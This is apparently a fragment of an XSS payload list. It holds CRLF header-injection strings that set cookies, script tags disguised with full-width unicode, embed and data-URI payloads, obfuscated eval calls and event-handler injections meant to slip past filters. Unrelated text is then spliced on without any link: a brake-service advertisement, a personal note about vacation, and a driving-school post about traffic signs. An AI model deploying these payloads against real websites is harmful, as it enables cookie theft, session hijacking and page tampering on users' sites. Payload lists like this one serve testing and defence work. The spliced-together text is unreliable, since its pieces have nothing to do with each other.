%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE%0D%0A%0D%0A<script>%0D%0Aalert(1);%0D%0A</script>
echo('IPT>alert("XSS")</SCRIPT>'); ?>
eeee<%2fscript><script>prompt(/XSS/.source)<%2fscript>yyyy
%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
%EF%BC%9Cscript%EF%BC%9E alert() %EF%BC%9C/script%EF%BC%9E
%EF%BC%9Cscript%EF%BC%9Ealert()%EF%BC%9C/script%EF%BC%9E
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<embed code=javascript:javascript:alert(1);></embed>
<embed code=%(scriptlet)s></embed>
<embed src="data:image/svg+xml;>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<embed src="data:text/html;base64,%(base64)s">
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<embed src="javascript:alert(1)">
<embed src=javascript:alert(1)>
<embed src=%(jscript)s></embed>
<embed type="image" src=%(scriptlet)s></embed>
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
">Enter_Mouse_Pointer_Here_to_get_XSS<P/onpointerenter="alert(1)"><<"
Enter_Mouse_Pointer_Here_to_get_XSS<P/onpointerenter="alert(1)">
en-us/Search#/?search="><img src=x onerror=prompt(document.domain);>
eval(0x258da033.toString(30))(1)
eval(1558153217..toString(36))(1)
eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
eval(630038579..toString(30))(1)
eval('alert(1)');
eval('al'+'ert'+'(12)');//
eval.apply`${[`alert\x2823\x29`]}`
eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”> <iframe
eval(atob('YWxlcnQoKQ=='))
eval.call`${'alert\x2823\x29'}`
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0:2(1)',3,3,'javascript||alert'.split('|'),0,{}))
";eval(unescape(location))//# %0Aalert(0)
";eval(unescape(location))//#%0Aprompt(0)
%";eval(unescape(location))//#%0Aprompt(0)
"-eval("window['pro'%2B'mpt'](8)")-"
'-eval("window['pro'%2B'mpt'](8)")-'
<event-source src="%(event)s" onload="javascript:alert(1)">
<event-source src=javascript:alert(1)>
eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCdYU1MgUE9DIGJ5IERFREknKTwvc2NyaXB0PiJ9
<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074/AAAA/>
<fieldset form="javascript:alert('XSS')">
&fileName=')},1000);alert("XSS`);//
fileName=')},1000);alert("XSS`);//
[]["filter"]["constructor"]("alert(1)")()
"firstname":"<img src ='","lastname":"'onerror=print()>"
<font style='color:expression(alert(1))'>
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
foo%00<script>alert(document.cookie)</script>
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
foo?q=foo<script>alert('xss')<%2fscript>
foo<script>alert(document.cookie)</script>
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><script>javascript:alert(1)</script>">
<footer id=x tabindex=1 onfocus=alert(1)></footer>
<% foo><x foo=&q
KNOW THE SIGNS & STAY AHEAD OF
BRAKE PROBLEMS.
Acceleration tends to get the most attention when it comes to cars, but great performance is about more than going fast. It’s also about stopping quickly.
When you have a brake problem, bringing your car to a full stop can take more effort than it should. Spongy brakes can cause big trouble if not addressed right away with a brake inspection and service.
I'm guilty. I am guilty of not taking enough time off of work, or waiting until I am absolutely spent to take time off. I just need to sail through the next five days, and I'll be off for a week.
Then! I'll be at full sunshine again - my normal, sociable self.
Traffic signs are the silent speakers on the road. Be it the driver or a pedestrian, having a sound knowledge about road safety is absolutely necessary for all before hitting the roads.Traffic signs give information about the road conditions ahead, provide instructions to be followed at the major crossroads or junctions, warn or guide drivers, and ensure proper functioning of road traffic. Being unaware of road signs is dangerous. It can lead to loss of life and property. A person is supposed to be familiar with the traffic signs and symbols before acquiring a driving license in India.
Visit: www.drivekool.com/
#TrafficSigns #RoadSignals #BeAlert #CautiousDriving #PreventAccident #DrivingTips #Drivekool